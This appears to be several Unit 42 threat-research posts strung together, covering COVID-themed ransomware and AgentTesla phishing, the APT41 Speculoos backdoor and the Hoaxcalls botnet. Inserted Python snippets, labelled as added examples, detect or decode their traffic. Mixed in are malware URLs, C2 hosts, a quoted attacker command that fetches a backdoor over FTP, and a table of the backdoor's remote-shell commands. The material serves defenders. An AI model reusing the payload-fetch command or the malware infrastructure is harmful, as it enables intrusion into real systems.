1de6e6c140ff1b301b7df12d4b6388a21a6fbf0f141347dd2f9289740438a6d8
corona-virusapps[.]com/s1/CoronaVirus-apps.apk
a754c35dd09677b0b96d8a0dad5c9c5fdd28abd8cf2d8d38a9bd945ca8362e02
corona-virusapps[.]com/s2/CoronaVirus-apps.apk
bca52647ce9f4900b754fcc0d8ef6329fb0229401e833534905969d10a82d839
corona-virusapps[.]com/s3/CoronaVirus-apps.apk
c3096b341d6807a5a7d353f97554017a6242349b081837de60908081bcada1d0

RedLine Stealer:
covid-19-gov[.]com
45.142.212[.]126
c50c4cff782e1bb7171ffb04cb7c1ff69af47371e059bf300fed68949c77514c (hosted zip file)
f3b0aa7d9664258c9e1783289c4fc56e05b23e3eb9a3557f55733806564deb73 (payload)

DanaBot:
202.195.34[.]6
corona-map-data[.]com/bin/regsrtjser346.exe
44c7ef261a066790a4ce332afc634fb5f89f3273c0c908ec02ab666088b27757

NetSupportManagerRAT:
5.181.156[.]14
covidpreventandcure[.]com
covidwhereandhow[.]xyz
1a08a65d4199f08d60644f2aee1182d87f29b36d38257239e5c80965ed65e0d1

AzoRult:
coronavirusstatus.space
2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307

Redirector (registrar.js):
coronavirus123[.]org (parent URL)
covide19cleanse[.]com (parent URL)
cdn.dsultra[.]com/js/registrar.js
f6a46b22d26523d4db3dd78fa77c56d4e755aed942321751eda0f48955861ab9

Skimmer (ccard.js):
www.sunrisepromos[.]com/promotional-personal-care-accessories/personalized-hand-sanitizer.html (parent URL)
www.sunrisepromos[.]com/js/lib/ccard.js
e43bdc87269d0b9da7742049dd533db93579cf3126df433f08e8265edd09243e

External Lists:
Credential Phishing IOCs: https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Phishing%20User%20Credentials%20with%20Coronavirus%20Domains

Scam IOCs:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Feeding%20on%20Coronavirus%20Fears%20for%20Profit

Black Hat SEO IOCs:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Abuse%20of%20Coronavirus%20Trends%20for%20Black%20Hat%20SEO

Suspicious Registrations:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Proactive%20Registrations%20of%20Suspicious%20Parked%20Pages

Malicious Attackers Target Government and Medical Organizations With COVID-19 Themed Phishing Campaigns

Executive Summary

Despite prior reporting by various sources indicating that some cyber threat attacker activity may subside in some respects during the COVID-19 pandemic, Unit 42 has observed quite the opposite with regard to COVID-19 themed threats, particularly in the realm of phishing attacks.

While the various COVID-19 themed phishing campaigns observed by Unit 42 are numerous, this blog seeks to provide a thorough picture and solid technical analysis of the cross-section of the various types of COVID-19 themed threats organizations may be facing during the ongoing pandemic. Specifically, we address a ransomware variant (EDA2) observed in attacks on a Canadian government healthcare organization and a Canadian medical research university, as well as an infostealer variant (AgentTesla) observed in attacks against various other targets (e.g., a United States defense research entity, a Turkish government agency managing public works, a German industrial manufacturing firm, a Korean chemical manufacturer, a research institute located in Japan and medical research facilities in Canada).

None of the malware samples mentioned in this blog were successful in reaching their intended targets. Our threat prevention platform with WildFire detects activity associated with these threat groups while simultaneously updating the ‘malware’ category within the URL Filtering solution for malicious and/or compromised domains that have been identified.

Ransomware Campaign

Campaign Overview

Between March 24, 2020 at 18:25 UTC and March 26 at 11:54 UTC, Unit 42 observed several malicious emails sent from the spoofed address noreply@who[.]int (the actual sender IP address at the time of the attack was 176.223.133[.]91) to several individuals associated with a Canadian government health organization actively engaged in COVID-19 response efforts and a Canadian university conducting COVID-19 research. The emails all contained a malicious Rich Text Format (RTF) phishing lure with the file name 20200323-sitrep-63-covid-19.doc (SHA256: 62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617), which, when opened with a vulnerable application, attempted to deliver a ransomware payload by exploiting a known shared Microsoft component vulnerability, CVE-2012-0158.

It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates. It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.

Figure 1. Ransomware phishing lure

SHA256: 62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617
Subjects: Coronavirus disease; COVID19
Spoofed Sender: noreply@who[.]int
File name: 20200323-sitrep-63-covid-19.doc
C2 Domain: www.tempinfo.96[.]lt

Table 1. Ransomware campaign attributes

Post-Infection

Once opened with vulnerable document viewing software, the malicious attachment drops a ransomware binary to disk at C:\Users\<victim username>\AppData\Local\svchost.exe, then executes it. It is worth mentioning that the dropped binary has the hidden attribute set, and has an Adobe Acrobat icon.

When the ransomware binary is executed, an HTTP GET request for the resource tempinfo.96[.]lt/wras/RANSOM20.jpg is initiated. This image is the main ransomware infection notification displayed to the victim:

Figure 2. Ransomware image download network traffic

Figure 3. Ransomware notification image

This image is then saved to disk at C:\Users\<victim username>\ransom20.jpg, and is subsequently set as the victim user’s desktop wallpaper. At the time of the attack, the domain tempinfo.96[.]lt resolved to the IP address 31.170.167[.]123.

After the image is downloaded, an HTTP POST request to the resource www.tempinfo.96[.]lt/wras/createkeys.php is made containing the user name and host name of the victim. Of particular note is that connectivity to the remote host is first checked via use of HTTP 100 Continue prior to the malware transmitting the host details:

Figure 4. Network traffic, victim host detail transfer

Once the remote command and control (C2) server successfully receives the victim’s details, it then proceeds to create a custom key based on the username/hostname details and sends the key back to the infected host for further processing. Once the key is received from the C2 server, the infected host then initiates an HTTP POST request to the resource www.tempinfo.96[.]lt/wras/savekey.php containing its hostname and the main decryption key for the host, which is, in itself, AES encrypted:

Figure 5. Network traffic, ransomware key exchange
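The GET for RANSOM20.jpg followed by the POSTs to createkeys.php and savekey.php form an ordered sequence that a web proxy log can be checked for, and a client that has completed the third request is about to start encrypting. The Python below is an added example, not part of the original post: the log format (timestamp, client IP, method, URL), every log line, the stage bookkeeping and the function names are constructed for this illustration.

```python
import re
from collections import defaultdict

# Constructed proxy-style log lines: timestamp, client IP, method, URL. Only the
# request shape and ordering matter here. 10.0.0.7 shows the full beacon
# sequence, 10.0.0.9 fetched the notification image only, 10.0.0.12 is benign.
SAMPLE_LOG = """\
2020-03-25T14:02:11Z 10.0.0.7  GET  http://tempinfo.96.lt/wras/RANSOM20.jpg
2020-03-25T14:02:12Z 10.0.0.12 GET  http://intranet.example/news.html
2020-03-25T14:02:13Z 10.0.0.7  POST http://www.tempinfo.96.lt/wras/createkeys.php
2020-03-25T14:02:15Z 10.0.0.9  GET  http://tempinfo.96.lt/wras/RANSOM20.jpg
2020-03-25T14:02:16Z 10.0.0.7  POST http://www.tempinfo.96.lt/wras/savekey.php
2020-03-25T14:02:20Z 10.0.0.9  GET  http://www.example.org/
""".splitlines()

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")

# The three C2 requests, in the order the post describes them.
STAGES = [
    ("GET",  re.compile(r"tempinfo\.96\.lt/wras/RANSOM20\.jpg$", re.IGNORECASE)),
    ("POST", re.compile(r"tempinfo\.96\.lt/wras/createkeys\.php$", re.IGNORECASE)),
    ("POST", re.compile(r"tempinfo\.96\.lt/wras/savekey\.php$", re.IGNORECASE)),
]


def track_stages(lines):
    """Return {client_ip: number of stages completed in order} for every client seen."""
    progress = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, method, url = m["src"], m["method"], m["url"]
        idx = progress[src]                      # next stage this client must hit
        if idx < len(STAGES):
            want_method, pattern = STAGES[idx]
            if method == want_method and pattern.search(url):
                progress[src] = idx + 1
    return dict(progress)


def classify(lines):
    """Split clients into 'encrypting' (key exchange finished) and 'partial' (beacon seen)."""
    progress = track_stages(lines)
    encrypting = sorted(ip for ip, n in progress.items() if n == len(STAGES))
    partial = sorted(ip for ip, n in progress.items() if 0 < n < len(STAGES))
    return {"encrypting": encrypting, "partial": partial}


if __name__ == "__main__":
    print(classify(SAMPLE_LOG))
```

Because stages are matched strictly in order, a client that only downloaded the notification image (for example because the POSTs were blocked) is reported as partial rather than as an active encryption event, which is the distinction a responder wants when prioritising hosts.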

At this point, encryption of the victim’s files begins. This particular ransomware binary is configured to encrypt files with the following file extensions:

".abw", ".aww", ".chm", ".dbx", ".djvu", ".doc", ".docm", ".docx", ".dot", ".dotm", ".dotx", ".epub", ".gp4", ".ind", ".indd", ".key", ".keynote", ".mht", ".mpp", ".odf", ".ods", ".odt", ".ott", ".oxps", ".pages", ".pdf", ".pmd", ".pot", ".potx", ".pps", ".ppsx", ".ppt", ".pptm", ".pptx", ".prn", ".prproj", ".ps", ".pub", ".pwi", ".rtf", ".sdd", ".sdw", ".shs", ".snp", ".sxw", ".tpl", ".vsd", ".wpd", ".wps", ".wri", ".xps", ".bak", ".bbb", ".bkf", ".bkp", ".dbk", ".gho", ".iso", ".json", ".mdbackup", ".nba", ".nbf", ".nco", ".nrg", ".old", ".rar", ".sbf", ".sbu", ".spb", ".spba", ".tib", ".wbcat", ".zip", "7z", ".dll", ".dbf"

The encryption algorithm is fairly simple, and, when encrypted, files are renamed with a .locked20 extension:

Figure 6. Ransomware encryption source code

Additionally, this ransomware binary has a particularly substantial limitation: it is hardcoded to only encrypt files and directories that are on the victim's desktop.

Figure 7. Ransomware encryption initiation source code

Threat Identification

From the code structure of the binary and the host based and network based behaviors of the ransomware, Unit 42 has determined that the ransomware variant used in this attack is EDA2, an open-source ransomware variant associated with a larger, parent ransomware family called HiddenTear.

Additional information on this ransomware variant can be found here.

AgentTesla Campaign

It is not a surprise to see malspam actors also taking advantage of the ongoing COVID-19 pandemic crisis and using COVID-19 as a lure to entice victims to click on malicious attachments and infect their systems. Figure 8 gives an example of one such malspam campaign with a COVID-19 lure.

Figure 8. Malspam email with COVID-19 lure delivering AgentTesla
SHA256:
fd4b4799079cdd970eec3884bef4771624a55297086041fd4e7fcefb1a86d08e
67b44bbf3f69e170f1e8ddea8d992dc83cfd351f06a28338b37dc16ad74826ef
14f6b1979ccc5d29c7b143009472d1edcfcdf0025bc2fa84ee445f17f091dd9a
590f84008dfd489fbf98d83e281fbb38c40d890169a9dbd482ff1f184cfb0970
Subjects: COVID-19 Supplier Notice
Sender: shipping@liquidroam.com
File names: COVID-19 Supplier Notice/COVID-19 Supplier Notice.jpg.exe; Corporate advisory CoronaVirus (Covid-19)/Corporate advisory Co
Initial C2 Domain: ftp[.]lookmegarment[.]com; 157[.]245.78[.]47

Table 2. AgentTesla campaign attributes

Figure 9 shows the campaign flow, where the email address shipping@liquidroam[.]com was used to send the malspam emails to a number of our customers in the healthcare, pharmaceutical and government industries, among others. After further analysis of the attachments, we found that the samples were droppers delivering variants of the AgentTesla malware family. AgentTesla is an info-stealing malware family that has been around since 2014. Since AgentTesla is sold on multiple forums commonly visited by cybercriminals, its use has grown significantly in the past few years, and it has been one of the top malware families of choice of the SilverTerrier threat actor, infamous for BEC campaigns. More details on the SilverTerrier campaigns can be found in the recent Unit 42 update here.

Figure 9. Maltego chart of the AgentTesla campaign

All the associated samples connected to the same C2 domain for exfiltration: ftp[.]lookmegarment[.]com. Our analysis also shows that the AgentTesla samples had hardcoded credentials used to communicate with the C2 over FTP. Figure 11 shows the exfiltration over FTP, where the C2 is running a Pure-FTPd server.

Figure 11. Network traffic, exfiltration

It is also important to note that the email sender domain, liquidroam[.]com, and the C2 domain, lookmegarment[.]com, are legitimate business domains selling electric skateboards and garment textiles, respectively. It is likely that the domains have been compromised and that their infrastructure is being used in the wider campaign of the cybercriminals.

Conclusion

The objective of this blog was to give a deeper understanding of some of the types of cybercrime campaigns being faced by multiple critical industries dealing with the urgent and critical response efforts of the COVID-19 pandemic. It is clear from these cases that the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are on the front lines and responding to the pandemic on a daily basis.

While this blog specifically focused on two campaigns, Unit 42 is tracking multiple campaigns with COVID-19 themes being used by threat actors on a daily basis and this trend is likely going to continue for weeks to come. We will continue updating the Unit 42 blog with new findings and observations on how the ongoing COVID-19 pandemic is being leveraged by cyber criminals for illicit profit.

Palo Alto Networks customers are already protected from the mentioned threats by:

  • Deploying Threat ID 1114703, 2878137, 2855181, 2850820, 2811429, 2888946
  • Wildfire successfully classifies the samples as malware
  • C2 domains are classified as malicious in DNS Security

IOCs

Ransomware Campaign:

RTF Phishing Lure: 62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617

Additional related RTF Lure (origin unknown):

42f04025460e5a6fc16d6182ee264d103d9bcd03fffd782c10f0b2e82b84f768

Ransomware Binary:

2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326

Mailing Infrastructure:

176.223.133[.]91

C2:

tempinfo.96[.]lt

31.170.167[.]123

AgentTesla Campaign:

AgentTesla Samples:

fd4b4799079cdd970eec3884bef4771624a55297086041fd4e7fcefb1a86d08e
67b44bbf3f69e170f1e8ddea8d992dc83cfd351f06a28338b37dc16ad74826ef
14f6b1979ccc5d29c7b143009472d1edcfcdf0025bc2fa84ee445f17f091dd9a
590f84008dfd489fbf98d83e281fbb38c40d890169a9dbd482ff1f184cfb0970

408bd4ffdff006738289dc51f1e51b00662508628ef8bb6147e3d88d4740ec4b

C2:

ftp[.]lookmegarment[.]com

157[.]245.78[.]47

APT41 Using New Speculoos Backdoor to Target Organizations Globally

Executive Summary

On March 25, 2020, FireEye published a research blog regarding a global attack campaign operated by an espionage motivated adversary group known as APT41. This attack campaign was thought to have operated between January 20 and March 11, specifically targeting Citrix, Cisco, and Zoho network appliances via exploitation of recently disclosed vulnerabilities. Based on WildFire and AutoFocus data available to Unit 42, we were able to obtain samples of the payload targeting Citrix appliances, which were executables compiled to run on FreeBSD. We also used this data to identify multiple victims in industries such as healthcare, higher education, manufacturing, government and technology services in multiple regions around the world, such as North America, South America, and Europe.

This blog will be specific to the FreeBSD-based payload that we have named Speculoos. We identified a total of five samples from our dataset, all of which were approximately the same file size, but contain minute differences amongst the sample set. The subtle differences indicate that they likely originated from the same developer and were either recompiled or patched. As described by FireEye, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679 which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, considering the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates the adversary was absolutely targeting the affected devices.

Palo Alto Networks customers are protected from this threat. Our threat prevention platform with Wildfire identifies this malware as malicious while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified. AutoFocus customers can continue to track Speculoos activity by using the Speculoos tag.

Attack Details

In this attack campaign, the adversaries exploited CVE-2019-19781 to direct the victim appliances to retrieve Speculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/<filename>, as reported by FireEye. Our data was consistent with this activity: the first wave ran from the evening of January 31, 2020 (UTC) to the afternoon of February 1, 2020 (UTC) and used the filename bsd. This wave affected multiple higher education organizations in the United States, a healthcare organization in the United States, and a consulting firm in Ireland. A second wave began on the morning of February 24, 2020 (UTC) and ran through February 24, 2020 after midnight UTC, this time using the filename un. This wave affected a higher education organization in Colombia, a manufacturing organization in Austria, a higher education organization in the United States that had also been targeted in the first wave, and a state government in the United States. While the data Unit 42 has access to is not exhaustive, the spread of victims we do have data on appears to indicate that this attack campaign may have been more of an opportunistic push by APT41 to gain footholds in a large number of organizations with minimal effort to expand their attack infrastructure.

The deployment of a tool built to run specifically on FreeBSD is fairly novel. Malware targeting BSD-based systems is relatively rare, and considering the use of this tool in conjunction with a vulnerability affecting specific Citrix network appliances, it is highly likely Speculoos was specifically crafted for this attack campaign by APT41.

Binary Analysis

The Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system. The payload does not appear to be able to maintain persistence natively, so the adversary likely needs a separate component or an additional step to maintain their foothold. Upon execution, the payload enters a loop that calls a function to communicate with the following command and control (C2) domain over TCP/443:

alibaba.zzux[.]com (resolving to 119.28.139[.]120)

If it is unable to communicate with the domain above, Speculoos will attempt to use a backup C2 at 119.28.139[.]20, also over TCP/443. If it is able to connect to either C2 server, it will carry out a TLS handshake with the server using the hardcoded buffer in the binary which is used as the first packet in the handshake. Before sending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15 with 28 pseudorandom bytes generated by iterating through the domain string, adding the current time and then using XOR on each byte with 7 multiplied by the byte's offset as a key. Figure 1 shows the hardcoded buffer before Speculoos modifies and sends it to the C2 server.

Figure 1. Hardcoded buffer used as the TLS Client Hello packet sent to the C2 server

Figure 1 suggests that this is a handshake packet for TLS 1.0, specifically the Client Hello. The most interesting part of this Client Hello packet is that it requests login.live[.]com as the Server Name Indication (SNI), which suggests that the author may be trying to make the handshake look innocuous, as seen in Figure 2.

Figure 2. Client Hello packet in the TLS handshake uses login.live.com as the Server Name Indication
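Because the SNI in the Client Hello (login.live[.]com) does not name the host the session actually goes to, the mismatch itself is a usable network indicator. The Python below is an added example, not code from the post or from Speculoos: it builds a minimal TLS 1.0 Client Hello as constructed input, locates gmt_unix_time at offset 11 and the 28 random bytes at offset 15 exactly as described above, extracts the SNI and compares it with the connected host. The function names and the sample timestamp are this example's own.

```python
import struct


def build_client_hello(server_name, gmt_unix_time, random28):
    """Build a minimal TLS 1.0 ClientHello with one SNI entry (constructed sample input)."""
    if len(random28) != 28:
        raise ValueError("Random needs exactly 28 bytes after the 4-byte time")
    name = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack(">H", len(name)) + name       # name_type host_name
    sni_list = struct.pack(">H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack(">HH", 0x0000, len(sni_list)) + sni_list  # extension type 0
    body = (b"\x03\x01"                                    # client_version = TLS 1.0
            + struct.pack(">I", gmt_unix_time) + random28   # Random: time + 28 bytes
            + b"\x00"                                      # empty session_id
            + struct.pack(">H", 2) + b"\x00\x2f"           # one cipher suite
            + b"\x01\x00"                                  # null compression only
            + struct.pack(">H", len(sni_ext)) + sni_ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def parse_client_hello(data):
    """Pull gmt_unix_time, the 28 random bytes and the SNI out of a ClientHello record."""
    if len(data) < 43 or data[0] != 0x16 or data[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    gmt_unix_time = struct.unpack(">I", data[11:15])[0]    # offset 11, as in the post
    random28 = data[15:43]                                 # offset 15, 28 bytes
    pos = 43
    pos += 1 + data[pos]                                   # session_id
    pos += 2 + struct.unpack(">H", data[pos:pos + 2])[0]   # cipher_suites
    pos += 1 + data[pos]                                   # compression_methods
    sni = None
    if pos + 2 <= len(data):
        ext_end = pos + 2 + struct.unpack(">H", data[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= ext_end:
            etype, elen = struct.unpack(">HH", data[pos:pos + 4])
            pos += 4
            if etype == 0x0000:
                # server_name: list_len(2), name_type(1), name_len(2), name
                name_len = struct.unpack(">H", data[pos + 3:pos + 5])[0]
                sni = data[pos + 5:pos + 5 + name_len].decode("ascii")
            pos += elen
    return {"gmt_unix_time": gmt_unix_time, "random": random28, "sni": sni}


def sni_mismatch(record, connected_host):
    """True when the ClientHello names a server other than the one actually contacted."""
    sni = parse_client_hello(record)["sni"]
    return sni is not None and sni.lower() != connected_host.lower()


# Constructed sample: SNI login.live.com inside a session to the C2 named in the post.
SAMPLE_HELLO = build_client_hello("login.live.com", 1580428800, bytes(range(28)))

if __name__ == "__main__":
    print(parse_client_hello(SAMPLE_HELLO)["sni"], sni_mismatch(SAMPLE_HELLO, "alibaba.zzux.com"))
```

A sensor that already resolves the destination (from DNS or the connection tuple) only needs the SNI comparison; the offsets matter when you want to inspect the random field that Speculoos fills in by hand.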

After successfully connecting to the C2 and completing the TLS handshake, Speculoos will perform an initial system enumeration to fingerprint the victim system then send the data back to the C2 server. The buffer used to store the information will be 1048 bytes and will be structured as seen in Table 1 below.

Offset | Description | Notes
0 | Identifier | Hardcoded string "freebsd"
64 | Unknown | Hardcoded "5"
68 | Username | Uses getuid to get the user of the process, then getpwuid.pw_name to get the name
132 | MAC addresses | Uses if_nameindex to iterate through interfaces
152 | OS version | Result of uname -v
216 | Hostname | Result of uname -s or hostname
280 | Disk space | Enumerates file systems at / and /private/var
904 | Physical memory | sysctl hw.physmem
908 | User memory | sysctl hw.usermem
912 | Number of CPUs | sysctl hw.ncpu
916 | CPU speed | sysctl machdep.tsc_freq/1000000
920 | CPU model | sysctl hw.model

Table 1. Structure used to transmit gathered system information to the C2
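The layout in Table 1 can be turned into a parser for an analyst who has the decrypted TLS payload. The Python below is an added example, not code from the post or from Speculoos. Field sizes are inferred from the gaps between the offsets in Table 1; reading the sysctl values as 4-byte little-endian integers and the FIELDS / parse_beacon / looks_like_speculoos names are this example's assumptions, and all sample values are constructed.

```python
import struct

BUFFER_SIZE = 1048

# Field layout taken from the offsets in Table 1. The field sizes are inferred
# from the gaps between offsets, and reading the numeric sysctl values as 4-byte
# little-endian integers is an assumption of this example, not something the post states.
FIELDS = [
    (0,   64,  "identifier",    "str"),
    (64,  4,   "unknown",       "str"),   # hardcoded "5"
    (68,  64,  "username",      "str"),
    (132, 20,  "mac_addresses", "raw"),
    (152, 64,  "os_version",    "str"),
    (216, 64,  "hostname",      "str"),
    (280, 624, "disk_space",    "str"),
    (904, 4,   "physmem",       "u32"),
    (908, 4,   "usermem",       "u32"),
    (912, 4,   "ncpu",          "u32"),
    (916, 4,   "cpu_mhz",       "u32"),
    (920, 128, "cpu_model",     "str"),
]


def parse_beacon(buf):
    """Decode a 1048-byte fingerprint buffer into a dict keyed by field name."""
    if len(buf) != BUFFER_SIZE:
        raise ValueError(f"expected {BUFFER_SIZE} bytes, got {len(buf)}")
    out = {}
    for off, size, name, kind in FIELDS:
        chunk = buf[off:off + size]
        if kind == "str":
            out[name] = chunk.split(b"\x00", 1)[0].decode("ascii", "replace")
        elif kind == "u32":
            out[name] = struct.unpack("<I", chunk)[0]
        else:
            out[name] = chunk.hex()
    return out


def build_beacon(values):
    """Inverse of parse_beacon, used here only to construct a sample buffer."""
    buf = bytearray(BUFFER_SIZE)
    for off, size, name, kind in FIELDS:
        value = values.get(name)
        if value is None:
            continue
        if kind == "str":
            data = value.encode("ascii")[:size - 1]   # leave room for a NUL terminator
        elif kind == "u32":
            data = struct.pack("<I", value)
        else:
            data = bytes.fromhex(value)[:size]
        buf[off:off + len(data)] = data
    return bytes(buf)


def looks_like_speculoos(buf):
    """Cheap content check on decrypted C2 traffic: the two hardcoded marker fields."""
    try:
        fields = parse_beacon(buf)
    except ValueError:
        return False
    return fields["identifier"] == "freebsd" and fields["unknown"] == "5"


# Constructed sample values; nothing here comes from a real victim.
SAMPLE_VALUES = {
    "identifier": "freebsd", "unknown": "5", "username": "nobody",
    "mac_addresses": "005056ab12cd", "os_version": "FreeBSD 8.4-RELEASE-p3 #0",
    "hostname": "ns-gateway-01", "disk_space": "/ 2048MB free; /private/var 512MB free",
    "physmem": 2147483648, "usermem": 2097152000, "ncpu": 2, "cpu_mhz": 2400,
    "cpu_model": "Intel(R) Xeon(R) CPU",
}
SAMPLE_BEACON = build_beacon(SAMPLE_VALUES)

if __name__ == "__main__":
    for k, v in parse_beacon(SAMPLE_BEACON).items():
        print(f"{k:14s} {v}")
```

The marker check is deliberately narrow: the "freebsd" identifier at offset 0 and the "5" at offset 64 are the only two constants the post reports, so that is all a decrypted-traffic rule can safely key on.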

The data is sent over the TLS channel and two bytes of data are expected in response by Speculoos. After a successful response, it will then send a single byte (0xa) to the C2 and enter a loop to begin receiving commands. The commands in Table 2 are then made available for the adversary to execute on the victim system. The commands available to Speculoos indicate that this tool is a fully functional backdoor which gives the adversary full control over the victim system.

Command | Sub-command | Description
0x1E | | Creates shell related sub-command handler
0x1E | w (0x77) | Creates a remote shell by forking off a "/bin/sh" process and redirects standard input, output and error to the TLS socket
f (0x66) | | Creates disk related sub-command handler
f (0x66) | f (0x66) | Remove File (unlink function)
f (0x66) | k (0x6B) | Remove Directory (rm -rf "<path>")
f (0x66) | e (0x65) | Run specified file (execv)
f (0x66) | g (0x67) | Download file
f (0x66) | i (0x69) | Upload file
0x14 | | Enumerate Processes (Name, PID, PPID, Threads)
0x15 | | Kill process
0x1 | | List Folder Contents
! (0x21) | | Execute command using "sh -c"

Table 2. Commands in Speculoos’s command handler

The two Speculoos samples we analyzed were functionally identical, with only eight bytes differing between the two. This eight-byte change was caused by the author replacing the uname -s command with the hostname command when gathering system information. It is unclear why the command was changed, as the two return different results: uname -s returns the kernel information, which is the string FreeBSD on a FreeBSD system, while hostname prints the name of the host system. Figure 3 shows a binary comparison between the two Speculoos samples we analyzed that highlights the eight-byte difference.

Figure 3. Binary comparison between two Speculoos samples showing different commands used to gather the hostname of the system

Impact Assessment

Vulnerabilities that allow remote code execution by unauthorized users are nearly always a potentially high-impact security issue, especially if they affect systems that are public-facing. In this case, CVE-2019-19781 affected multiple appliances that may be public-facing, and a highly motivated adversary was actively exploiting the vulnerability to install a custom backdoor. Considering the types of appliances that were affected, it is critical that any organization that may be affected take mitigation actions immediately. Because all or a significant portion of network activity must traverse these compromised network appliances, adversaries can more easily monitor or modify an entire organization's network activity instead of being relegated to a single device or a handful of devices.

In addition, because by default these appliances have access to a large number of organizational systems, lateral movement becomes far less of a challenge. The adversaries may attempt to move directly to other hosts whose traffic must pass through the compromised appliances, or may even be able to modify network traffic to perform additional malicious actions, such as injecting or delivering malicious code, executing man-in-the-middle attacks, or redirecting users to adversary-owned login pages to harvest credentials. Lastly, due to the nature of appliances, detecting these attacks may be significantly more challenging, as they are generally black-box solutions that are not often interacted with or inspected for anomalous activity unless an issue arises.

Palo Alto Networks customers may be protected by:

  • Deploying Threat ID 57625, 57570, and 57497
  • WildFire properly classifies Speculoos as malicious
  • C2 domain has been classified as malicious in DNS Security
  • AutoFocus customers may learn more via the Speculoos tag

Indicators of Compromise

Analyzed Speculoos SHA256

99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28

6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167

Additional Speculoos SHA256

493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e

85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d

c2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1

Network Indicators

119.28.139[.]20

alibaba.zzux[.]com

119.28.139[.]120

66.42.98[.]220

exchange.longmusic[.]com

Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet

Executive Summary

As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722. As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and DrayTek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devices identified during our research prior to publication in an effort to help with awareness and remediation. The Grandstream devices are IP-based business telephone systems, whereas the DrayTek devices are routers.

Both CVE-2020-8515 and CVE-2020-5722 have a critical rating (i.e., a CVSS v3.1 score of 9.8 out of 10) due to their trivial-to-exploit nature. Once exploited, the attacker can execute arbitrary commands on the vulnerable device. It's not surprising that threat actors collect these exploits into their arsenals and start wreaking havoc in the Internet of Things (IoT) realm. While Palo Alto Networks customers are protected from such ongoing infections, they are still advised to apply patches as soon as possible.

The malware, which we have dubbed "Hoaxcalls" after the name of the IRC channel used for command and control (C2) communications, is built on the Gafgyt/Bashlite malware family codebase and is capable of launching a variety of DDoS attacks based on the C2 commands received. In addition to its advanced DDoS capabilities, Hoaxcalls can also propagate by exploiting the aforementioned critical vulnerabilities.

DDoS Bot - Hoaxcalls

Hoaxcalls is a DDoS bot that communicates with its C2 server over IRC. It supports various DDoS attack types, selected by the C2 operator. Upon receiving the corresponding C2 command, it can propagate by scanning for and infecting vulnerable devices using CVE-2020-8515 and CVE-2020-5722 exploits.

Upon execution, Hoaxcalls initializes a message table, XOR-decrypts a specific message based on its index, fetches and prints the message to the console, and then re-encrypts the decrypted message. The index of the encrypted string is 0x21, and the decrypted message is “hubnr and vbrxmr was here”.

The encryption scheme is the standard byte-wise XOR seen in most Mirai variants, with the exception that five 8-byte table keys are used instead of a single one:

0x1337C0D3
0x0420A941
0x4578BEAD
0x0000A10E
0x6531A466

This is effectively the equivalent of XOR-ing each byte of the encrypted strings with 0xEC. A similar use of multiple XOR keys was observed in a previous variant.
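As an added example (not code from the post or from the malware itself), the following Python reproduces the table-decryption scheme just described and shows why the five keys reduce to a single XOR byte. Each key is folded byte-wise the way Mirai's table_unlock_val does it; the sample table is constructed from the two plaintexts quoted in this post, so the index values and strings are the post's, while the function names are this example's own.

```python
# Added example (not code from the Unit 42 post or from the malware): the
# Mirai-style table decryption described above, using the five keys the
# post lists, to show why they collapse to a single XOR byte.

# The five table keys quoted in the post (each written as 8 hex digits).
TABLE_KEYS = [0x1337C0D3, 0x0420A941, 0x4578BEAD, 0x0000A10E, 0x6531A466]


def key_bytes(key):
    """Split a 32-bit table key into its four bytes."""
    return [(key >> shift) & 0xFF for shift in (0, 8, 16, 24)]


def xor_with_key(data, key):
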